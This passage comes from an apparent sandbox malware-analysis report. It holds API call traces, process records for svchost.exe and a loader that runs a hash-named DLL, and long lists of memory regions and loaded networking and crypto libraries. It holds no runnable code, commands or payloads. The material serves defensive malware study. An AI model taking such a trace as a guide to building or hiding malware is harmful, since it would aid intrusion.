lpMem=0x57a6b0 | out: hHeap=0x570000) returned 1 [0274.599] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x574860 | out: hHeap=0x570000) returned 1 [0274.602] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x585ee0 | out: hHeap=0x570000) returned 1 [0274.602] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="FlsFree") returned 0x7ffc5c00ca20 [0274.603] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x57aca0 | out: hHeap=0x570000) returned 1 [0274.603] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x585b10 | out: hHeap=0x570000) returned 1 [0274.603] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="FlsFree") returned 0x7ffc5c00ca20 [0274.604] FreeLibrary (hLibModule=0x7ffc5bfa0000) returned 1 [0274.604] FreeLibrary (hLibModule=0x7ffc5bfa0000) returned 1 [0274.604] FreeLibrary (hLibModule=0x7ffc5bfa0000) returned 1 [0274.604] FreeLibrary (hLibModule=0x7ffc5ecd0000) returned 1 [0274.607] LocalFree (hMem=0x579770) returned 0x0 [0274.607] GetModuleHandleW (lpModuleName=0x0) returned 0x7ff626f50000 [0274.607] GetModuleHandleW (lpModuleName=0x0) returned 0x7ff626f50000 [0274.607] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x582390 | out: hHeap=0x570000) returned 1 [0274.607] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x584680 | out: hHeap=0x570000) returned 1 [0274.608] LoadLibraryExW (lpLibFileName="api-ms-win-appmodel-runtime-l1-1-2", hFile=0x0, dwFlags=0x800) returned 0x7ffc5be50000 [0274.608] GetProcAddress (hModule=0x7ffc5be50000, lpProcName="AppPolicyGetProcessTerminationMethod") returned 0x0 [0274.608] GetModuleHandleExW (in: dwFlags=0x0, lpModuleName="mscoree.dll", phModule=0x14fe98 | out: phModule=0x14fe98) returned 0 [0274.608] ExitProcess (uExitCode=0x0) [0274.608] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x57c320 | out: hHeap=0x570000) returned 1 Thread: id = 190 os_tid = 0x95c Process: id = "22" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x126cf000" os_pid = "0x1c4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x3c4" cmd_line = "C:\\Windows\\system32\\svchost.exe -k UnistackSvcGroup" cur_dir = "C:\\Users\\RDhJ0CNFevzX\\Desktop\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fd44" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 6127 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 6128 start_va = 0x30000 end_va = 0x44fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 6129 start_va = 0x50000 end_va = 0xcffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 6130 start_va = 0xd0000 end_va = 0xd3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 6131 start_va = 0xe0000 end_va = 0xe0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000e0000" filename = "" Region: id = 6132 start_va = 0xf0000 end_va = 0xf1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 6133 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 6134 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 6135 start_va = 0x7df5fffc0000 end_va = 0x7df5fffe2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5fffc0000" filename = "" Region: id = 6136 start_va = 0x7df5ffff0000 end_va = 0x7ff5fffeffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffff0000" filename = "" Region: id = 6137 start_va = 0x7ff60e670000 end_va = 0x7ff60e67cfff monitored = 0 entry_point = 0x7ff60e673980 region_type = mapped_file name = "svchost.exe" filename = "\\Windows\\System32\\svchost.exe" (normalized: "c:\\windows\\system32\\svchost.exe") Region: id = 6138 start_va = 0x7ffc5f810000 end_va = 0x7ffc5f9d0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 6139 start_va = 0x7ff60e670000 end_va = 0x7ff60e6b9fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ff60e670000" filename = "" Thread: id = 191 os_tid = 0x254 Process: id = "23" image_name = "giumlol.exe" filename = "c:\\users\\rdhj0cnfevzx\\desktop\\giumlol.exe" page_root = "0x156ae000" os_pid = "0xdc4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xcc8" cmd_line = "\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe\" /dll=\"C:\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll\" /fn_id=opj_encode" cur_dir = "C:\\Users\\RDhJ0CNFevzX\\Desktop\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fd44" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 6140 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 6141 start_va = 0x30000 end_va = 0x44fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 6142 start_va = 0x50000 end_va = 0x14ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 6143 start_va = 0x150000 end_va = 0x153fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000150000" filename = "" Region: id = 6144 start_va = 0x160000 end_va = 0x160fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000160000" filename = "" Region: id = 6145 start_va = 0x170000 end_va = 0x171fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 6146 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 6147 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 6148 start_va = 0x7ff5fffd0000 end_va = 0x7ff5ffff2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff5fffd0000" filename = "" Region: id = 6149 start_va = 0x7ff626f50000 end_va = 0x7ff626f77fff monitored = 1 entry_point = 0x7ff626f51e8c region_type = mapped_file name = "giumlol.exe" filename = "\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\giumlol.exe") Region: id = 6150 start_va = 0x7ffc5f810000 end_va = 0x7ffc5f9d0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 6151 start_va = 0x560000 end_va = 0x65ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000560000" filename = "" Region: id = 6152 start_va = 0x7ffc5bfa0000 end_va = 0x7ffc5c187fff monitored = 0 entry_point = 0x7ffc5bfcba70 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 6153 start_va = 0x7ffc5ecd0000 end_va = 0x7ffc5ed7cfff monitored = 0 entry_point = 0x7ffc5ece81a0 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 6154 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 6155 start_va = 0x7ff5ffed0000 end_va = 0x7ff5fffcffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff5ffed0000" filename = "" Region: id = 6156 start_va = 0x400000 end_va = 0x4bdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 6157 start_va = 0x7ffc5e960000 end_va = 0x7ffc5eab5fff monitored = 0 entry_point = 0x7ffc5e96a8d0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 6158 start_va = 0x7ffc5f540000 end_va = 0x7ffc5f6c5fff monitored = 0 entry_point = 0x7ffc5f58ffc0 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 6159 start_va = 0x660000 end_va = 0x75ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000660000" filename = "" Region: id = 6160 start_va = 0x7ffc5cc80000 end_va = 0x7ffc5e1defff monitored = 0 entry_point = 0x7ffc5cde11f0 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 6161 start_va = 0x7ffc5e850000 end_va = 0x7ffc5e8ecfff monitored = 0 entry_point = 0x7ffc5e8578a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 6162 start_va = 0x7ffc5bec0000 end_va = 0x7ffc5bf02fff monitored = 0 entry_point = 0x7ffc5bed4b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 6163 start_va = 0x7ffc5c3c0000 end_va = 0x7ffc5ca03fff monitored = 0 entry_point = 0x7ffc5c5864b0 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll") Region: id = 6164 start_va = 0x7ffc5f2c0000 end_va = 0x7ffc5f53cfff monitored = 0 entry_point = 0x7ffc5f394970 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 6165 start_va = 0x7ffc5e2b0000 end_va = 0x7ffc5e3cbfff monitored = 0 entry_point = 0x7ffc5e2f02b0 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 6166 start_va = 0x20000 end_va = 0x26fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 6167 start_va = 0x7ffc5cac0000 end_va = 0x7ffc5cb29fff monitored = 0 entry_point = 0x7ffc5caf6d50 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 6168 start_va = 0x7ffc5ec20000 end_va = 0x7ffc5ecc6fff monitored = 0 entry_point = 0x7ffc5ec358d0 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 6169 start_va = 0x7ffc5e8f0000 end_va = 0x7ffc5e94afff monitored = 0 entry_point = 0x7ffc5e9038b0 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 6170 start_va = 0x7ffc5e7b0000 end_va = 0x7ffc5e801fff monitored = 0 entry_point = 0x7ffc5e7bf530 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 6171 start_va = 0x7ffc5be50000 end_va = 0x7ffc5be5efff monitored = 0 entry_point = 0x7ffc5be53210 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 6172 start_va = 0x7ffc5cb50000 end_va = 0x7ffc5cc04fff monitored = 0 entry_point = 0x7ffc5cb922e0 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll") Region: id = 6173 start_va = 0x7ffc5be70000 end_va = 0x7ffc5bebafff monitored = 0 entry_point = 0x7ffc5be735f0 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 6174 start_va = 0x7ffc5be30000 end_va = 0x7ffc5be43fff monitored = 0 entry_point = 0x7ffc5be352e0 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 6175 start_va = 0x7ffc5e3e0000 end_va = 0x7ffc5e522fff monitored = 0 entry_point = 0x7ffc5e408210 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 6178 start_va = 0x180000 end_va = 0x1b8fff monitored = 0 entry_point = 0x1812f0 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 6179 start_va = 0x760000 end_va = 0x8e7fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000760000" filename = "" Region: id = 6180 start_va = 0x7ffc5e810000 end_va = 0x7ffc5e84afff monitored = 0 entry_point = 0x7ffc5e8112f0 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 6181 start_va = 0x8f0000 end_va = 0xa70fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000008f0000" filename = "" Region: id = 6182 start_va = 0xa80000 end_va = 0x1e7ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a80000" filename = "" Region: id = 6183 start_va = 0x180000 end_va = 0x180fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000180000" filename = "" Region: id = 6184 start_va = 0x190000 end_va = 0x190fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000190000" filename = "" Region: id = 6185 start_va = 0x1e80000 end_va = 0x205ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e80000" filename = "" Region: id = 6186 start_va = 0x1a0000 end_va = 0x1a6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 6188 start_va = 0x1e80000 end_va = 0x1f3ffff monitored = 0 entry_point = 0x1ea0da0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 6189 start_va = 0x2050000 end_va = 0x205ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002050000" filename = "" Region: id = 6190 start_va = 0x7ffc45e90000 end_va = 0x7ffc45fd6fff monitored = 1 entry_point = 0x7ffc45f67cec region_type = mapped_file name = "8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll" filename = "\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll") Region: id = 6192 start_va = 0x1e80000 end_va = 0x1f7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e80000" filename = "" Region: id = 6193 start_va = 0x2060000 end_va = 0x225ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002060000" filename = "" Region: id = 6194 start_va = 0x2260000 end_va = 0x265ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002260000" filename = "" Region: id = 6195 start_va = 0x2660000 end_va = 0x2e5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002660000" filename = "" Region: id = 6197 start_va = 0x2e60000 end_va = 0x3e2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002e60000" filename = "" Region: id = 6448 start_va = 0x180000000 end_va = 0x180018fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000180000000" filename = "" Region: id = 6449 start_va = 0x3e30000 end_va = 0x4166fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 6484 start_va = 0x7ffc51070000 end_va = 0x7ffc512fdfff monitored = 0 entry_point = 0x7ffc51140f00 region_type = mapped_file name = "wininet.dll" filename = "\\Windows\\System32\\wininet.dll" (normalized: "c:\\windows\\system32\\wininet.dll") Region: id = 6485 start_va = 0x4170000 end_va = 0x43fafff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004170000" filename = "" Region: id = 6567 start_va = 0x4170000 end_va = 0x42b8fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004170000" filename = "" Region: id = 6604 start_va = 0x4170000 end_va = 0x4336fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004170000" filename = "" Region: id = 7941 start_va = 0x4170000 end_va = 0x5707fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004170000" filename = "" Region: id = 8883 start_va = 0x7ffc5bcc0000 end_va = 0x7ffc5bce8fff monitored = 0 entry_point = 0x7ffc5bcd4530 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll") Region: id = 8922 start_va = 0x7ffc5c190000 end_va = 0x7ffc5c356fff monitored = 0 entry_point = 0x7ffc5c1edb80 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll") Region: id = 8923 start_va = 0x7ffc5be60000 end_va = 0x7ffc5be6ffff monitored = 0 entry_point = 0x7ffc5be656e0 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll") Region: id = 8924 start_va = 0x4170000 end_va = 0x426ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004170000" filename = "" Region: id = 8976 start_va = 0x4270000 end_va = 0x4437fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004270000" filename = "" Region: id = 9119 start_va = 0x7ffc5a8a0000 end_va = 0x7ffc5a949fff monitored = 0 entry_point = 0x7ffc5a8c7910 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll") Region: id = 9120 start_va = 0x7ffc5e740000 end_va = 0x7ffc5e7aafff monitored = 0 entry_point = 0x7ffc5e7590c0 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 9121 start_va = 0x7ffc5e950000 end_va = 0x7ffc5e957fff monitored = 0 entry_point = 0x7ffc5e951ea0 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 9162 start_va = 0x7ffc5cb30000 end_va = 0x7ffc5cb46fff monitored = 0 entry_point = 0x7ffc5cb31390 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 9258 start_va = 0x4270000 end_va = 0x43d3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004270000" filename = "" Region: id = 9431 start_va = 0x7ffc4bf10000 end_va = 0x7ffc4bf1afff monitored = 0 entry_point = 0x7ffc4bf124e0 region_type = mapped_file name = "ktmw32.dll" filename = "\\Windows\\System32\\ktmw32.dll" (normalized: "c:\\windows\\system32\\ktmw32.dll") Region: id = 9432 start_va = 0x1b0000 end_va = 0x1bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 9481 start_va = 0x1b0000 end_va = 0x1d3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 9482 start_va = 0x1e0000 end_va = 0x1e6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 9483 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9484 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9485 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9486 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9487 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9488 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9489 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9490 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9491 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9492 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9493 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9494 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9495 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9496 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9497 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9498 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9499 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9500 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9501 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9502 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9503 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9504 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9505 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9506 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9507 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9508 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9509 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9510 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9511 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9512 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9513 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9514 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9515 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9516 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9517 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9518 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9519 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9575 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9576 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9577 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9578 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9579 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9580 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9581 start_va = 